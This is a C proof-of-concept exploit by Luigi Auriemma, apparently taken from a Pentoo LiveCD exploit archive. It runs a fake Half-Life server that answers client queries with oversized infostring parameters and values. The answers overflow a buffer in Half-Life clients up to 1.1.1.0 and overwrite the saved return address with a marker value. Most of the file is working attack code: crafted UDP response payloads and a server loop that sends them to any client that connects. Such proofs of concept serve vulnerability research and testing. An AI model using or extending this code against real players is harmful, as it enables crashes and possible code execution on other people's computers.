home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / games / halflife / hlbof-client.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  9KB  |  429 lines

---

1. #include <stdio.h>
2. #include <stdlib.h>
3. #include <string.h>
4.  
5. #ifdef WIN
6.     #include <winsock.h>
7.     #include "winerr.h"
8.  
9.     #define    close    closesocket
10. #else
11.     #include <unistd.h>
12.     #include <sys/socket.h>
13.     #include <sys/types.h>
14.     #include <arpa/inet.h>
15.     #include <netdb.h>
16. #endif
17.  
18.  
19.  
20. #define VER        "0.1"
21. #define PORT    27015
22. #define BUFFSZ    2048
23.  
24.  
25.  
26. /* QUERIES */
27. #define PING    "ping"
28. #define INFOS    "infostring"
29. #define INFO    "info"
30. #define DET     "details"
31. #define CHALL    "getchallenge"
32. #define PLAY    "players"
33. #define RULES    "rules"
34. #define RCON    "challenge rcon"
35. #define CONN    "connect"
36.  
37.  
38. /* ANSWERS */
39. #define INFOS1P    "\xff\xff\xff\xff" \
40.         "infostringresponse\x00" \
41.         "\\" \
42.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
43.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
44.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
45.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
46.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
47.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
48.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
49.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
50.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
51.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
52.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
53.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
54.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
55.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
56.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
57.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
58. /* EIP */    "EIP." \
59.         "\\0" \
60.         "\\protocol\\46" \
61.         "\\address\\1.2.3.4:27015" \
62.         "\\players\\3" \
63.         "\\proxytarget\\0" \
64.         "\\lan\\0" \
65.         "\\max\\16" \
66.         "\\gamedir\\valve" \
67.         "\\description\\Half-Life" \
68.         "\\hostname\\Test" \
69.         "\\map\\map" \
70.         "\\type\\l" \
71.         "\\password\\0" \
72.         "\\os\\w" \
73.         "\\secure\\0" \
74.         "\x00"
75.  
76. #define INFOS1V    "\xff\xff\xff\xff" \
77.         "infostringresponse\x00" \
78.         "\\hostname\\" \
79.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
80.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
81.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
82.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
83.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
84.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
85.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
86.         "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
87.         "aaaaaaaaaaaaaaaa" \
88. /* EIP */    "EIP." \
89.         "\\protocol\\46" \
90.         "\\address\\1.2.3.4:27015" \
91.         "\\players\\3" \
92.         "\\proxytarget\\0" \
93.         "\\lan\\0" \
94.         "\\max\\16" \
95.         "\\gamedir\\valve" \
96.         "\\description\\Half-Life" \
97.         "\\hostname\\Test" \
98.         "\\map\\map" \
99.         "\\type\\l" \
100.         "\\password\\0" \
101.         "\\os\\w" \
102.         "\\secure\\0" \
103.         "\x00"
104.  
105. #define PING1    "\xff\xff\xff\xff" \
106.         "j\x00"
107.  
108. #define PLAY1    "\xff\xff\xff\xff" \
109.         "D" \
110. /* players */    "\x03" \
111.         "\x01" "player1\0" "\x04\x00\x00\x00" "\xff\xff\xff\xff" \
112.         "\x02" "player2\0" "\x06\x00\x00\x00" "\xff\xff\xff\xff" \
113.         "\x03" "player3\0" "\x09\x01\x00\x00" "\xff\xff\xff\xff"
114. //        |      |           |                  |
115. //        |      |           |                  total time in-game
116. //        |      |           number of frags
117. //        |      player name
118. //        player ID
119.  
120. #define RULES1    "\xff\xff\xff\xff" \
121.         "E" \
122. /* rules */    "\x2b\x00" \
123.         "mp_logfile\0" "1\0" \
124.         "deathmatch\0" "1\0" \
125.         "coop\0" "0\0" \
126.         "pausable\0" "0\0" \
127.         "sv_voiceenable\0" "1\0" \
128.         "mp_consistency\0" "1\0" \
129.         "sv_contact\0" "contactme\0" \
130.         "sv_proxies\0" "1\0" \
131.         "sv_password\0" "0\0" \
132.         "sv_aim\0" "0\0" \
133.         "sv_gravity\0" "800\0" \
134.         "sv_friction\0" "4\0" \
135.         "edgefriction\0" "2\0" \
136.         "sv_stopspeed\0" "100\0" \
137.         "sv_maxspeed\0" "270\0" \
138.         "mp_footsteps\0" "1\0" \
139.         "sv_accelerate\0" "10\0" \
140.         "sv_stepsize\0" "18\0" \
141.         "sv_clipmode\0" "0\0" \
142.         "sv_bounce\0" "1\0" \
143.         "sv_airmove\0" "1\0" \
144.         "sv_airaccelerate\0" "10\0" \
145.         "sv_wateraccelerate\0" "10\0" \
146.         "sv_waterfriction\0" "1\0" \
147.         "sv_clienttrace\0" "3.5\0" \
148.         "sv_cheats\0" "0\0" \
149.         "sv_allowupload\0" "1\0" \
150.         "sv_minrate\0" "0\0" \
151.         "sv_maxrate\0" "0\0" \
152.         "mp_teamplay\0" "0\0" \
153.         "mp_fraglimit\0" "20.000000\0" \
154.         "mp_timelimit\0" "20.000000\0" \
155.         "mp_fragsleft\0" "9999\0" \
156.         "mp_timeleft\0" "1088\0" \
157.         "mp_friendlyfire\0" "1\0" \
158.         "mp_falldamage\0" "1\0" \
159.         "mp_weaponstay\0" "1\0" \
160.         "mp_forcerespawn\0" "1\0" \
161.         "mp_flashlight\0" "1\0" \
162.         "mp_autocrosshair\0" "0\0" \
163.         "decalfrequency\0" "30\0" \
164.         "mp_teamlist\0" "hgrunt;scientist\0" \
165.         "mp_allowmonsters\0" "0\0" \
166.         "mp_chattime\0" "10\0"
167. //        |           |    | |
168. //        |           |    | NULL
169. //        |           |    rule value
170. //        |           NULL
171. //        rule name
172.  
173. #define CHALL1    "\xff\xff\xff\xff" \
174.         "A00000000 123456789 2\n\x00"
175. //                   |
176. //               challenge key
177.  
178. #define DET1    "\xff\xff\xff\xff" \
179.                 "m" \
180. /* IP&port */   "1.2.3.4:27015\0" \
181. /* hostname */    "Test\0"\
182. /* mapname */    "map\0"\
183. /* gamedir */    "valve\0"\
184. /* descr */     "Half-Life\0"\
185. /* clients */    "\x03" \
186. /* maxclients*/    "\x10" \
187. /* protocol */    "\x2e" \
188. /* type */      "l" \
189. /* OS */        "w" \
190. /* passwordd */    "\x00" \
191. /* mod run */    "\x00" \
192.             "\x00"
193.  
194. #define CONN1    "\xff\xff\xff\xff" \
195.         "B" \
196.         "4294967371 3 \"1.2.3.4:27005\"\0"
197.  
198.  
199. #define BUGNUM  "" \
200. "1 = Parameter buffer-overflow: the return address of the clients will be overwritten with \"EIP.\" (0x2e504945)\n" \
201. "2 = Value buffer-overflow: the return address of the clients will be overwritten with \"EIP.\" (0x2e504945)\n"
202.  
203.  
204.  
205.  
206.  
207. void show_dump(unsigned char *buff, unsigned int buffsz);
208. void std_err(void);
209.  
210.  
211.  
212.  
213.  
214. int main(int argc, char *argv[]) {
215.     int         sd,
216.                 err,
217.                 plen,
218.                 infostrlen;
219.     u_short        port = PORT;
220.     struct    sockaddr_in    peerc,
221.                 peers;
222.     u_char        buff[BUFFSZ],
223.             *infostr;
224.  
225.  
226.     fputs("\n"
227.         "Half-Life <= 1.1.1.0 passive buffer-overflow test "VER"\n"
228.         "by Auriemma Luigi\n"
229.         "e-mail: aluigi@pivx.com\n"
230.         "web:    http://www.pivx.com/luigi/\n"
231.         "\n", stdout);
232.  
233.  
234.     if(argc < 2) {
235.         printf("\nUsage: %s <bug_num> [listening_port(%hu)]\n"
236.             "\n\nbug_num:\n\n"
237.             BUGNUM
238.             "\n", argv[0], PORT);
239.         exit(1);
240.     }
241.  
242.  
243.  
244.     switch(argv[1][0]) {
245.         case '1': {
246.             infostr = INFOS1P;
247.             infostrlen = sizeof(INFOS1P) - 1;
248.             } break;
249.         case '2': {
250.             infostr = INFOS1V;
251.             infostrlen = sizeof(INFOS1V) - 1;
252.             } break;
253.         default: {
254.             fputs("\nError: You must chose the bug number:\n\n"
255.                 BUGNUM
256.                 "\n", stdout);
257.             exit(1);
258.         }
259.     }
260.     if(argc > 2) port = atoi(argv[2]);
261.  
262.  
263. #ifdef WIN
264.     WSADATA    wsadata;
265.     err = WSAStartup(MAKEWORD(2,0), &wsadata);
266.     if(err < 0) std_err();
267. #endif
268.  
269.  
270.     sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
271.     if(sd < 0) std_err();
272.  
273.     peers.sin_addr.s_addr = INADDR_ANY;
274.     peers.sin_port        = htons(port);
275.     peers.sin_family      = AF_INET;
276.     plen                  = sizeof(peerc);
277.  
278.     err = bind(sd, (struct sockaddr *)&peers, plen);
279.     if(err < 0) std_err();
280.  
281.  
282.     printf("\nListening on UDP port %u\n\n"
283.         "NOTE: use a debugger to see the exception and the overwritten EIP\n\n",
284.         port);
285.  
286.  
287.     while(1) {
288.         err = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peerc, &plen);
289.         if(err < 0) std_err();
290.         buff[err] = 0x00;
291.  
292.  
293.         printf("%s:%d = ",
294.             inet_ntoa(peerc.sin_addr),
295.             htons(peerc.sin_port));
296.  
297.         /* --- */
298.  
299.         if(!memcmp(buff + 4, INFOS, sizeof(INFOS) - 1)) {
300.             fputs("INFOSTRING (buffer-overflow)\n", stdout);
301.             sendto(sd, infostr, infostrlen, 0, (struct sockaddr *)&peerc, plen);
302.             continue;
303.         }
304.  
305.         if(!memcmp(buff + 4, PING, sizeof(PING) - 1)) {
306.             fputs("PING\n", stdout);
307.             sendto(sd, PING1, sizeof(PING1) - 1, 0, (struct sockaddr *)&peerc, plen);
308.             continue;
309.         }
310.  
311.         if(!memcmp(buff + 4, PLAY, sizeof(PLAY) - 1)) {
312.             fputs("PLAYERS\n", stdout);
313.             sendto(sd, PLAY1, sizeof(PLAY1) - 1, 0, (struct sockaddr *)&peerc, plen);
314.             continue;
315.         }
316.  
317.         if(!memcmp(buff + 4, RULES, sizeof(RULES) - 1)) {
318.             fputs("RULES\n", stdout);
319.             sendto(sd, RULES1, sizeof(RULES1) - 1, 0, (struct sockaddr *)&peerc, plen);
320.             continue;
321.         }
322.  
323.         if(!memcmp(buff + 4, CHALL, sizeof(CHALL) - 1)) {
324.             fputs("GETCHALLENGE\n", stdout);
325.             sendto(sd, CHALL1, sizeof(CHALL1) - 1, 0, (struct sockaddr *)&peerc, plen);
326.             continue;
327.         }
328.  
329.         if(!memcmp(buff + 4, DET, sizeof(DET) - 1)) {
330.             fputs("DETAILS\n", stdout);
331.             sendto(sd, DET1, sizeof(DET1) - 1, 0, (struct sockaddr *)&peerc, plen);
332.             continue;
333.         }
334.  
335.         if(!memcmp(buff + 4, CONN, sizeof(CONN) - 1)) {
336.             printf("CONNECT: \n%s\n", buff + 4);
337.             sendto(sd, CONN1, sizeof(CONN1) - 1, 0, (struct sockaddr *)&peerc, plen);
338.             continue;
339.         }
340.  
341.         fputs("Unknown data:\n", stdout);
342.         show_dump(buff, err);
343.     }
344.  
345.     close(sd);
346.     return 0;
347. }
348.  
349.  
350.  
351.  
352.  
353. void show_dump(unsigned char *buff, unsigned int buffsz) {
354.     const char    *hex = "0123456789abcdef";
355.     unsigned char    buffout[80],
356.             *ptrout,
357.             *ptr;
358.     unsigned int    num;
359.     int        i,
360.             j,
361.             rest;
362.  
363.     num = buffsz >> 4;        /* 16 caratteri */
364.     rest = (buffsz - (num << 4));
365.     ptr = buff;
366.  
367.  
368.     for(i = 0; i < num; i++) {
369.         ptrout = buffout;
370.         for(j = 0; j < 16; j++) {
371.             *ptrout++ = hex[*ptr >> 4];
372.             *ptrout++ = hex[*ptr & 0xf];
373.             *ptrout++ = 0x20;
374.             *ptr++;
375.         }
376.         *ptrout++ = 0x20;
377.         *ptrout++ = 0x20;
378.  
379.         ptr -= 16;
380.         for(j = 0; j < 16; j++) {
381.             if(*ptr > 0x20) *ptrout = *ptr;
382.                 else *ptrout = '.';
383.             ptr++;
384.             ptrout++;
385.         }
386.         *ptrout++ = 0x0a;
387.         *ptrout = 0x00;
388.         fputs(buffout, stdout);
389.     }
390.  
391.     if(rest) {
392.         ptrout = buffout;
393.         for(j = 0; j < rest; j++) {
394.             *ptrout++ = hex[*ptr >> 4];
395.             *ptrout++ = hex[*ptr & 0xf];
396.             *ptrout++ = 0x20;
397.             *ptr++;
398.         }
399.  
400.         j = 50 - (ptrout - buffout);
401.         memset(ptrout, 0x20, j);
402.         ptrout += j;
403.  
404.         ptr -= rest;
405.         for(j = 0; j < rest; j++) {
406.             if(*ptr > 0x20) *ptrout = *ptr;
407.                 else *ptrout = '.';
408.             ptr++;
409.             ptrout++;
410.         }
411.         *ptrout++ = 0x0a;
412.         *ptrout = 0x00;
413.         fputs(buffout, stdout);
414.     }
415. }
416.  
417.  
418.  
419.  
420.  
421. #ifndef WIN
422.     void std_err(void) {
423.         perror("\nError");
424.         exit(1);
425.     }
426. #endif
427.  
428.  
429.